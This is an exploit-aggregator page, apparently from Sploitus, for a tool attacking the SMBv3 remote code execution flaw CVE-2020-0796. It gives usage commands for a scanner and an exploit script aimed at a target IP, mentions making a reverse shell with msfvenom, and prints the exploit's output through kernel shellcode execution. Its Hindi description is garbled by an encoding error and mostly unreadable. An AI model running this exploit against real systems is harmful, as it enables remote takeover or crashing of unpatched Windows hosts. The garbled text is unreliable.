Sploitus

Exploit for cve-2020-0796 CVE-2020-0796

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN14 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-OLDDREAM666-CVE-2020-0796
CVE-2020-0796 SMBv3 рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдореЗрдВ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рд╕рдВрдкреАрдбрд╝рд┐рдд рдкреИрдХреЗрдЯреЛрдВ рдХреЛ рд╕рдВрд╕рд╛рдзрд┐рдд рдХрд░рддреЗ рд╕рдордп рд╣реБрдИ рддреНрд░реБрдЯрд┐ рдХреЗ рдХрд╛рд░рдг рд╣реЛрддрд╛ рд╣реИ; рдкреИрдХреЗрдЯ рдХреЛ рдбреАрдХрдВрдкреНрд░реЗрд╕ рдХрд░рддреЗ рд╕рдордп, рдХреНрд▓рд╛рдЗрдВрдЯ рджреНрд╡рд╛рд░рд╛ рднреЗрдЬреА рдЧрдИ рд▓рдВрдмрд╛рдИ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣ рдЬрд╛рдБрдЪ рдирд╣реАрдВ рдХреА рдЬрд╛рддреА рдХрд┐ рд▓рдВрдмрд╛рдИ рд╡реИрдз рд╣реИ рдпрд╛ рдирд╣реАрдВ, рдЬрд┐рд╕рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рдкреВрд░реНрдгрд╛рдВрдХ рдЕрддрд┐рдкреНрд░рд╡рд╛рд╣ рд╣реЛрддрд╛ рд╣реИред рдпрд╣ рджреВрд░рд╕реНрде, рдЕрдкреНрд░рдорд╛рдгрд┐рдд рд╣рдорд▓рд╛рд╡рд░ рдХреЛ рд▓рдХреНрд╖реНрдп рдкреНрд░рдгрд╛рд▓реА рдкрд░ рдордирдорд╛рдирд╛ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдпрд╣ рднреЗрджреНрдпрддрд╛ EternalBlue (MS17-010) рдХреЗ рд╕рдорд╛рди рд╣реИред

рдкреНрд░рднрд╛рд╡рд┐рдд рд╕рдВрд╕реНрдХрд░рдг: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)

## рд╢рд╛рдорд┐рд▓ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХрд╛ рдкрд░рд┐рдЪрдп

scanner.py CVE-2020-0796 рднреЗрджреНрдпрддрд╛ рд╡рд╛рд▓реЗ рд╣реЛрд╕реНрдЯ рдХреЛ рд╕реНрдХреИрди рдХрд░рдиреЗ рдФрд░ рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рд╛рд░реВрдк: python scanner.py ip рдЙрджрд╛рд╣рд░рдг: python scanner.py 192.168.1.2

## рдЖрдЙрдЯрдкреБрдЯ: рднреЗрджреНрдпрддрд╛ рдореМрдЬреВрдж: ip Vulnerable. рдХреЛрдИ рднреЗрджреНрдпрддрд╛ рдирд╣реАрдВ: ip Not vulnerable.

exploit.py рднреЗрджреНрдпрддрд╛ рд╡рд╛рд▓реЗ рд▓рдХреНрд╖реНрдп рд╣реЛрд╕реНрдЯ рдкрд░ рд╣рдорд▓рд╛ рдХрд░рддрд╛ рд╣реИ, рдбрд┐рдлрд╝реЙрд▓реНрдЯ PoC рдмреНрд▓реВ рд╕реНрдХреНрд░реАрди рдЙрддреНрдкрдиреНрди рдХрд░рддрд╛ рд╣реИ, msfvenom рдХреЗ рд╕рд╛рде рд░рд┐рд╡рд░реНрд╕ PoC рдЙрддреНрдкрдиреНрди рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдкреНрд░рд╛рд░реВрдк: python exploit.py -ip ip рдЙрджрд╛рд╣рд░рдг: python exploit.py -ip 192.168.1.2

рдЖрдЙрдЯрдкреБрдЯ: [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...